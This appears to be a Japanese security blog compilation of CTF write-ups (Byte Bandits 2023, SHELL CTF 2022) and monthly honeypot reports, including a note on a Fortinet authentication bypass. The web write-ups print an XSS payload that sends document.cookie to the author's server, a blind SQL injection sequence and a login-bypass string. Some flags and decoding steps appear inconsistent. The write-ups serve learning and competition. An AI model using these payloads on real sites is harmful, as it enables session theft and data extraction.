土, 04 2月 2023, 06:30 UTC — 日, 05 2月 2023, 06:30 UTCに開催されたByte Bandits CTF 2023 に会社のチームで参加した。 他のチームメンバーの陰で6問解いたので、以下にWriteupを記載する。

Web

Hi-Score

Reach 100 clicks per second for a reward.
web.bbctf.fluxus.co.in:1003

指定されたURLへアクセスすると画面をクリックするサイトが表示される。
1秒以内に100回クリックする必要があるようだ。

ソースを確認するとJavascriptで雑に難読化されているが、/.secretion/flag へアクセスすればflagが取れることが分かる。

以下サイトへアクセスするとflagがかかれたファイルが取得できる。 http://chal.bbctf.fluxus.co.in:1003/.secretion/flag　

flag : flag{THAtS_15_A_SM4rT_m0ve}

Improper Error Handling

This website is giving errors. Can you figure it out ?
web.bbctf.fluxus.co.in:1001

指定されたURLへアクセスするとパスワードを入力するサイトが表示される。
短い文字を入力するとError: Length too short のメッセージが表示される。
試しに大量の文字を入れるとハッシュ化されたメッセージが表示される。 文字数を38文字で入力するとflagが表示される。

flag : BBCTF{tHis_i5_1t_Y0u_CraCk3D_iT}

Hash Browns

twist, lick, dunk and trail
web.bbctf.fluxus.co.in:1004

指定されたURLへアクセスするとメッセージのみが記載されたサイトが表示される。

cookieにgarlic : cmztpaurxxnoqz3p2on73msbohg5sk74l2fxnxp27gky6cdjqzqq6nadが指定されているだけで入力部分は無し。


ヒントに玉ねぎの画像が追加されていることからonionルーティングを確認する。

cookieの値より、cmztpaurxxnoqz3p2on73msbohg5sk74l2fxnxp27gky6cdjqzqq6nad.onion にアクセスするとflagが記載されたサイトにアクセスできる。

flag : flag{Y0U_H4V3_B33N_W4RN3D}

Misc

Peer Pressure

Don't let them get into your mind
web.bbctf.fluxus.co.in:1002

指定されたURLへアクセスすると Click Here と書かれたボタンのみが表示される。
ソースコードよりボタンを押すとyoutubeの動画に飛ばされる。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form action="/aGVhZA==" method="GET">
        <button type="submit">Click Here</button>
    </form>

</body>
</html>

対象のURLへOPTIONSでアクセスするとHEADリクエストが使えることがわかる。

HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.10.6
Date: Sun, 05 Feb 2023 02:48:10 GMT
Content-Type: text/html; charset=utf-8
Allow: HEAD, GET, OPTIONS, POST
Content-Length: 0
Connection: close

対象サイトへHEADリクエストでアクセスすると挙動が変わり、png画像が応答される。

取得したPNG画像の"tEXtComment"の部分にflagが記載されている。

flag{D0_N0T_G3T_PR355UR3D}

Forensic

Random Requests

I recorded these very random http requests. Can you help me decode them?

attachement : random_requests_pcapng

添付ファイルは1Mbyte程度のpcapファイル。
　 NW通信の中身はhttpリクエストの/flag=0の形でバイナリデータとしてデータを送信している。 　 /flag=0と/flag=1の部分を抽出し、つなげた上でBase64エンコードすればflagが確認できそうだ。

httpリクエストでアクセス先の0と1を抽出してbase64デコードしたものがflagになる。文字の間は%20で区切られている。

C:\Wireshark>tshark -r C:\random_requests.pcapng -Y "http.request" -T fields -e http.request.full_uri
http://www.google.com/flag=0
http://www.google.com/flag=1
http://www.google.com/flag=0
http://www.google.com/flag=1
http://www.google.com/flag=1
http://www.google.com/flag=0
http://www.google.com/flag=1
http://www.google.com/flag=0
http://www.google.com/flag=%20

↓

01011010 01101101 01111000 01101000 01011010 00110011 01110100 01110101 01010100 00110001 01010010 01100110 01010101 00110010 00111001 01100110 01100011 01101010 01010010 01110101 01011010 01000111 00111001 01110100 01011000 00110010 01100111 00110011 01001110 00110011 01000010 01100110 01100011 01101010 01001110 01111000 01100100 01010100 01001101 00110001 01100100 01001000 01001110 00111001

↓

ZmxhZ3tuT1RfU29fcjRuZG9tX2g3N3BfcjNxdTM1dHN9

flag : flag{nOT_So_r4ndom_h77p_r3qu35ts}

Memory Dump

I was learning powershell when my pc suddenly crashed. Can you retrieve my bash history?
Download link: https://drive.google.com/drive/folders/1igAY42dIA-xrGMLH5_NVdq5nisVG4YLa?usp=share_link

問題文よりPowershellのhistory情報を確認する。
　

PS C:\> (Get-PSReadlineOption).HistorySavePath
C:\Users\***\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

　 ConsoleHost_history.txt　を探してみる。

┌──(root💀kali)-[/home/kali/Desktop/volatility3]
└─# python3 vol.py -f /home/kali/Desktop/Memdump.raw windows.filescan | grep ConsoleHost_history.txt                                                                                                                                     1 ⨯
0xc88f21961af0.0\Users\bbctf\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt    216

ConsoleHost_history.txt の中身を確認するとByteBandits-CTF Jan 2023をキーとしたAES暗号で暗号化していることが分かる。

┌──(root💀kali)-[/home/kali/Desktop/volatility3]
└─# python3 vol.py -f /home/kali/Desktop/Memdump.raw windows.dumpfiles.DumpFiles --virtaddr 0xc88f21961af0 
Volatility 3 Framework 2.4.1
Progress:  100.00               PDB scanning finished                        
Cache   FileObject      FileName        Result

DataSectionObject       0xc88f21961af0  ConsoleHost_history.txt file.0xc88f21961af0.0xc88f1e9b5570.DataSectionObject.ConsoleHost_history.txt.dat

┌──(root💀kali)-[/home/kali/Desktop/volatility3]
└─# cat file.0xc88f21961af0.0xc88f1e9b5570.DataSectionObject.ConsoleHost_history.txt.dat
$xorkey = bbctf
$xorkey = "bbctf"
$aescipherkey = "ByteBandits-CTF Jan 2023"
$encrypted_flag = "m74/XKCNkHmzJHEPAOHvegV96AOubRnSUQBpJnG4tHg="

192bitのAES暗号(ECBモード)としてシークレットキー：ByteBandits-CTF Jan 2023 で復号するとflagが確認できる。

┌──(root💀kali)-[/home/kali/Desktop/volatility3]
└─# echo -n "ZmxhZ3tWMExAdGlMaVR5XzRfZGFfdzFOfQ==" | base64 -d
flag{V0L@tiLiTy_4_da_w1N}

flag : flag{V0L@tiLiTy_4_da_w1N}

感想

• 正直Guees問が多い印象だった。同時刻開催のDiceCTFにチャレンジした方が勉強になったかもしれぬ...
• 激務過ぎてほぼ時間が取れないので、いい気晴らしにはなった。

今月のTopics

１．Fortinet製製品における認証バイパスの脆弱性

Fortinet製FortiOS、FortiProxyおよびFortiSwitchManagerの認証バイパスの脆弱性（CVE-2022-40684）に関する注意喚起 が報告された。

www.fortiguard.com www.jpcert.or.jp

PoCも多数公開されている。 認証回避の脆弱性を悪用して、指定したユーザーのSSH鍵を設定する。

出典： github.com

上記アクセスを確認すると調査用アクセスとして、数回のアクセスを観測した。PoCを使って動作検証をしており、501エラーで相手方へ戻っているようだ。 ※相手先ポートは80,81,9200が使われていた。

{
  "dest_ip": [
    "***.***.***.***"
  ],
  "dest_port": [
    9200
  ],
  "event_type": [
    "http"
  ],
  "geoip.city_name": [
    "London"
  ],
  "geoip.ip": [
    "212.71.255.156"
  ],
  "geoip.region_name": [
    "England"
  ],
  "geoip.timezone.keyword": [
    "Europe/London"
  ],
  "http.http_method": [
    "PUT"
  ],
  "http.http_port": [
    9200
  ],
  "http.http_user_agent": [
    "Report Runner"
  ],
  "http.protocol": [
    "HTTP/1.1"
  ],
  "http.status": [
    501
  ],
  "http.url": [
    "/api/v2/cmdb/system/admin/admin"
  ],
  "proto": [
    "TCP"
  ],
  "src_ip": [
    "212.71.255.156"
  ],
  "src_port": [
    33712
}

２．CodeBlue & AVTokyo参加

業務多忙の合間をぬってCodeBlue と AVTokyoに参加した。
・CodeBlueはC2サーバ関連の発表が特に印象的だった。C2情報をビットコインにのせる攻撃者の発想(ブロックチェーンに書き込まれた情報の削除は非常に困難)も凄いが、接続元IPを判定しないバグからシンクホールに追い込む発表者様の発想はもっと凄い。
・AVTokyoは初めてオフライン参加したが色々参考になった。知らない参加者の人にも積極的に声掛けできるようなコミュニケーション能力が必要だと痛感した。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年10月1日-2022年10月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

• T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

• Result
  • Mailoney、Dicompotのアクセス件数が減少

②攻撃元の国名と件数(Top 20)

• 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

• Result
  • Brazil(1位)～Netherlands(5位)までのアクセス順位に変動なし。
  • Costa Rica(17位)のアクセスを新規に観測した。

③検知したCVEの脆弱性と件数

• Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

• Result
  • 特記事項なし

④よく攻撃されるユーザ名

• ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

• Result
  • 特記事項なし

⑤よく攻撃されるパスワード

• パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

• Result
  • 全体的なアクセス件数は低下。
  • bzrx1098ui(50位)に新規パスワードを確認。脆弱なパスワードには含まれているが、どのような種類のパスワードかは不明

⑥今月のmasscanとZmap

• masscanの観測結果は以下の通り。

• Zmapの観測結果は以下の通り。

• Result

  • 特記事項は無し。

最後に

• AVTokyo2022のBadge、会社用に余分に購入したけど誰も欲しい人おらず。＿|￣|○il||li ｶﾞｯｸｼ･･il||li
• 10月はCodeBlue + AVTokyoと他セキュリティイベントが目白押しのため、有意義だが非常にhard!!

◆shファイルに関するアクセス

◆exeファイルに関するアクセス

• 無し

今月の作業BGM

今月のTopics

・2022年8月11日 – 2022年8月14日にDEF CON30が開催された。時間面および金銭面の都合により全く関係ないイベントだが、いつかは参加したい。

・アルミ電解コンデンサの世界トップシェアをもつ日本ケミコン株式会社にて管理サーバへの不正アクセスがあったとの発表があった。幸いデータの改ざんやシステムダウンなどの業務影響は発生していないとのことだが、2021年10月に三菱電機株式会社で安保情報を含む情報が流出したように、世界的なシェアを占める日本企業の機密情報の保護についてより一層の注力が必要になるだろう。 www.chemi-con.co.jp

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年8月1日-2022年8月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

• T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

• Result
  • 全体的な傾向は先月から変更なし

②攻撃元の国名と件数(Top 20)

• 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

• Result
  • ブラジル、アメリカ、ニュージーランドからのアクセスが依然として多かった。
  • 上位3か国の宛先ポートとして、ブラジルは53(647,154件)、アメリカは123(128,414件)、ニュージーランドは5900(349,378件)であった。

③検知したCVEの脆弱性と件数

• Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

• Result
  • 先月から変更なし

④よく攻撃されるユーザ名

• ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

• Result
  • ec2-user(46位)について、Amazon Linux2(EC2)のec2-user(デフォルトユーザー)に対するアクセスが確認された。AWSのようなインターネット経由でのアクセスが可能な環境においては特にセキュリティを意識する必要があるだろう。

⑤よく攻撃されるパスワード

• パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

• Result
  • J5cmmu=Kyf0-br8CsW(49位)について、不思議なパスワードを確認した。攻撃自体はリバースブルートフォース攻撃としてパスワードを固定した上で、ユーザ名部分を変更しながら試行している。

本パスワードは海外でも情報を求めている方がいるようで、情報提供募集中とのこと。

CHALLENGE: @hackaday
Password J5cmmu=Kyf0-br8CsW This doesn’t seem to show up anywhere other than the list of commonly guessed passwords. [David] asks for information on this password guess, if anybody knows where it’s from, and I’ll echo that curiosity.https://t.co/5mycksXpzN

— Netmux (@netmux) 2020年9月12日

⑥今月のmasscanとZmap

• masscanの観測結果は以下の通り。

• Zmapの観測結果は以下の通り。

• Result

  • 特記事項は無し。

最後に

• 今月も新規のmaliciousなファイルがBash系のファイルにて確認された。

◆shファイルに関するアクセス

◆exeファイルに関するアクセス

今月の作業BGM

2022年8月12日, 12:30 UTC - 8月14日, 12:30 UTCに開催されたSHELL CTF 2022 に会社のチームで参加した。 他のチームメンバーの陰で9問解いたので、以下にWriteupを記載する。

Chiper

Tring Tring....

Tring Tring my mobile started ringing. "Hey Check your SMS!!"

----. ----. ----. / -.... -.... -.... / ---.. ---.. / ..--- ..--- ..--- / ..--- / -.... -.... / --... --... --... / ...-- ...-- / ..--- / ...-- / -.... / ----. ----. ----. / --... --... --... --... / -.... / --... --... --... --...

Flag Format: SHELL{SOMETHINGHERE}

問題のメッセージをモールスコードとしてデコードすると9996668822226677733236999777767777という数字になる。

問題文の内容からMulti-tap Phone Cipher (SMS)を推測して解析するとflagが得られる。

flag : SHELL{YOUCANREADMYSMS}

Forensic

Alien Communication

Aliens are trying to communicate something. They belive in seeing more than what they are hearing. can you help us trying to decode what they are trying to say?

添付ファイルをスペクトル表示するとflagが確認できる。

flag : SHELL{YOUCANREADMYSMS}

Secret Document

"shell is the key if you did'nt get it xorry"

問題文からshellというキーワードと添付ファイルを XORすれば良いことが分かる。

flag : shell{y0u_c4n_s33_th3_h1dd3n}

Hidden File

Our Agent gave us this image can you find whats there with this image?

Exif情報で確認したパスワードshellによりsteghideツールを使ってHidden Files.zipファイルが抽出できる。

root@kali:# steghide extract -sf Hidden.jpg 
Enter passphrase: 
wrote extracted data to "Hidden Files.zip".

Hidden Files.zipファイルにはse3cretf1l3.pdfとsomething.jpg、パスワード付きのflag.zipがある。
se3cretf1l3.pdfをlibraofiiceで確認すると透明な文字でkey is shellctfと記載されていることが分かる。
判明したパスワードを使ってflag.zipを解凍するとflag.txtが確認できる。

flag : shell{y0u_g07_th3_flag_N1c3!}

GO Deep!

Our one of the agent gave us this file and said "Go Deep!"

wavファイルでDeepとあるので連想ゲームからDeepSoundを確認する。(はらたいらさんに3,000点はクイズダービー...)

DeepSoundで添付ファイルを開くとパスワードを求められる。この時、チームメンバーの方がwavファイルの中からpassword:shellであることを気付いていた。

判明したパスワードを使うとDeep Flag.txtが抽出でき、flagを確認できる。

flag : SHELL{y0u_w3r3_7h1nk1ng_R3ally_D33p}

Heaven

"I was in the seventh heaven painted red green and blue"

問題文からMSBのR,B,Gを確認するとflagがある。

flag : SHELL{man1pul4t1ng_w1th_31ts_15_3A5y}

Web

Choosy

Single solution doesn't works on all problems. One should try different solutions for different problem.

Flag format:- shellctf{H3re_1s_tH3_F14g}

http://20.125.142.38:8324

Alternate link http://20.193.247.209:8333/

指定されたURLへアクセスするとフォームの入力画面が表示される。

XSSの脆弱性がある。<script>タグは置換されるが1回だけなので、<scrscriptipt>のような形式で<script>となり発火できる。
scriptタグのサニタイジングがあるのでXSS問題かと連想できる。
色々確認していたところ、強制的にエラーを出すペイロードを入力するとflagの記載されたアラートが表示された。

<img/src=`%00` onerror=location.href='https://<My Server IP address>/123?'+document.cookie;>

flag : shellctf{50oom3_P4yL0aDS_aM0ng_Maaa4nnY}

Extractor

We are under emergency. Enemy is ready with its nuclear weapon we need to activate our gaurds but chief who had password is dead. There is portal at URL below which holds key within super-user account, can you get the key and save us.

Flag format :- shellctf{H3re_1s_tH3_fL4G}

http://20.125.142.38:8956

Alternate URL :- http://20.193.247.209:8555/

More Alternate URL :- http://52.66.29.74:8999/

指定されたURLへアクセスするとフォームの入力画面が表示される。

問題タイトルからSQLインジェクションの問題かと連想できる。
試しにpassword欄に' or 'a'='a' --を入力するとuser情報が表示される。
適当な文字を入力した際は何も表示されない。
user情報が表示される場合を正常としてBlindSqlインジェクションを試す。

http://52.66.29.74:8999/profile?username=121212&pass=%27%20or%20((SELECT%20length(tbl_name)%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_name%20not%20like%20%27sqlite_%%27%20limit%201%20offset%200)=6)%20--%20&content=1

' or ((SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('A')) -- 
　・
　・

→Table名はAdmins

http://52.66.29.74:8999/profile?username=121212&pass=%27%20or%20((SELECT%20length(sql)%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20limit%201%20offset%200)=140)%20--%20&content=1

' or ((SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' limit 1 offset 0) = hex('C')) --
　・
　・

→Table構造としてAdminsテーブルにid,user,pass,contentのカラムがある。
contentカラムの内容を確認するとflagが確認できる

' or ((SELECT hex(substr(content,1,1)) FROM Admins) = hex('s')) --
' or ((SELECT hex(substr(content,2,1)) FROM Admins) = hex('h')) --
' or ((SELECT hex(substr(content,3,1)) FROM Admins) = hex('e')) --
' or ((SELECT hex(substr(content,4,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,5,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,6,1)) FROM Admins) = hex('c')) --
' or ((SELECT hex(substr(content,7,1)) FROM Admins) = hex('t')) --
' or ((SELECT hex(substr(content,8,1)) FROM Admins) = hex('f')) --
' or ((SELECT hex(substr(content,9,1)) FROM Admins) = hex('{')) --
' or ((SELECT hex(substr(content,10,1)) FROM Admins) = hex('S')) --
' or ((SELECT hex(substr(content,11,1)) FROM Admins) = hex('q')) --
' or ((SELECT hex(substr(content,12,1)) FROM Admins) = hex('l')) --
' or ((SELECT hex(substr(content,13,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,14,1)) FROM Admins) = hex('1')) --
' or ((SELECT hex(substr(content,15,1)) FROM Admins) = hex('N')) --
' or ((SELECT hex(substr(content,16,1)) FROM Admins) = hex('j')) --
' or ((SELECT hex(substr(content,17,1)) FROM Admins) = hex('3')) --
' or ((SELECT hex(substr(content,18,1)) FROM Admins) = hex('c')) --
' or ((SELECT hex(substr(content,19,1)) FROM Admins) = hex('7')) --
' or ((SELECT hex(substr(content,20,1)) FROM Admins) = hex('i')) --
' or ((SELECT hex(substr(content,21,1)) FROM Admins) = hex('0')) --
' or ((SELECT hex(substr(content,22,1)) FROM Admins) = hex('n')) --
' or ((SELECT hex(substr(content,23,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,24,1)) FROM Admins) = hex('B')) --
' or ((SELECT hex(substr(content,25,1)) FROM Admins) = hex('4')) --
' or ((SELECT hex(substr(content,26,1)) FROM Admins) = hex('5')) --
' or ((SELECT hex(substr(content,27,1)) FROM Admins) = hex('i')) --
' or ((SELECT hex(substr(content,28,1)) FROM Admins) = hex('C')) --
' or ((SELECT hex(substr(content,29,1)) FROM Admins) = hex('_')) --
' or ((SELECT hex(substr(content,30,1)) FROM Admins) = hex('X')) --
' or ((SELECT hex(substr(content,31,1)) FROM Admins) = hex('D')) --
' or ((SELECT hex(substr(content,32,1)) FROM Admins) = hex('}')) --

flag : shellctf{Sql_1Nj3c7i0n_B45iC_XD}

Doc Holder

Can you share portable document with us which looks like it when we seet portable document with eyes but ti's not actually portable document.

More a misc problem ...

My Favourite move is Inferno overwrite 

http://20.125.142.38:8508

Alternate Link :- http://20.193.247.209:8666/

Hint --- Challenge is all about file extension of the file that you are uploading....

指定されたURLへアクセスするとファイルのアップロード画面が表示される。

.pdfの拡張子のTEXTファイルをアップロードするとメッセージが変わる

問題文から拡張子+overwriteでRLO (Right-to-Left Override)に関係すると考えられる。
メモ帳でhoge.を入力した後に右クリック→Unicode制御文字の挿入→RLOをクリックしてfdpを入力する。このhoge.pdfをファイル名にコピペする。

上記のhoge.pdfをアップロードするとflagが確認できる。

flag : shellctf{R1ghtt_t0_l3ft_0veRiDe_1s_k3Y}

感想

• Raw Agent は1つ目のflagはわかったが2つ目が解けず。無念...

1つ目のflagは問題を解く中の途中で出てくるアンノーンの画像のUSSERAGENT

2つ目のflagは最後のUltimate Level の時に表示されるGreninja.pngをzstegで解析した際に出てくるbase64文字からGoogleドライブのファイルを確認する。

root@kali:# Greninja.png 
b1,r,lsb,xy         .. text: "N?xZo5^Qz5xY"
b1,rgb,lsb,xy       .. text: "aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xTmxsVnJtckhkTEhSZ1g2c1Y1MzlMMVp6Ym5SR0N2ZHIvdmlldz91c3A9c2hhcmluZw"
b1,bgr,lsb,xy       .. <wbStego size=1184705, data="9`Ym!\xCDcn\xC1\xB7"..., even=false, enc="wbStego 2.x/3.x", controlbyte="\x84">
b1,rgba,lsb,xy      .. text: ";1WWs9}W"
b2,r,lsb,xy         .. file: MIPSEB MIPS-III ECOFF executable not stripped - version 21.68
b2,r,msb,xy         .. text: ["U" repeated 17 times]
b2,g,msb,xy         .. text: "QTAETUUUUUUUUUUUUUUUUUPUUUU"
b2,b,msb,xy         .. text: "TQTUUUUUUUUUUUUUUUUUA"
b2,rgb,lsb,xy       .. file: Targa image data (4416-1284) 20752 x 5125 x 16 +1300 +16400 - right - interleave "\025A\005A\024E\024\005\024Q\024P\005\004\021D\021\005\005\021\024T\024\004\005\004\005A\024T\024\004\020\025\021\021\025\021\021A\005\004\005A\025\020\020P\005\004\021D\025"                                                                                                       
b3,b,msb,xy         .. file: StarOffice Gallery theme @\022 H\022\004\010\222\004, 16842751 objects, 1st \001
b4,r,msb,xy         .. text: "Db1@qVUC1Uu26b&@edf7waQ3wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww7SUU"
b4,g,lsb,xy         .. file: PEX Binary Archive
b4,g,msb,xy         .. text: "q6VwwW33swDD\"f1@p@"
b4,b,lsb,xy         .. file: Targa image data - Map 272 x 4353 x 16 +257 +4113 "\001\020\020\001\021\001\021"
b4,b,msb,xy         .. text: "$T1ww7wwwwww7SswS3U3333ww7W&sW7Uswwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww7SU5swS5wwwEc"
b4,rgb,lsb,xy       .. file: Novell LANalyzer capture file
b4,abgr,msb,xy      .. file: Applesoft BASIC program data, first line number 15

root@kali:# echo "aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xTmxsVnJtckhkTEhSZ1g2c1Y1MzlMMVp6Ym5SR0N2ZHIvdmlldz91c3A9c2hhcmluZw"| base64 -d
https://drive.google.com/file/d/1NllVrmrHdLHRgX6sV539L1ZzbnRGCvdr/view?usp=sharingbase64: 無効な入力

↓

https://drive.google.com/file/d/1NllVrmrHdLHRgX6sV539L1ZzbnRGCvdr/view?usp=sharing

パスワード付きflag.txt.7zファイルのパスワードについて
問題途中のbr*infuckで確認できたメッセージ

Rhydon Togepi Milotic Machamp Tyrantrum Psyduck Mewtwo Pachirisu Altaria Magnezone P1k4cHu Dialga Gyarados Dragonite Eevee Luc4r10 Deoxys Zapdos Ch4r1zArD Rotom Gardevoir Unkn0Wn G0dz1lL4 Electrode Escavalier Garchomp Zygarde Blaziken Greninja

上記の内のLuc4r10で解凍すると2つ目のflagである_p4raM37eR_P0llu7iOnが確認できる。(G0dz1lL4はポケモンではないのでは...?)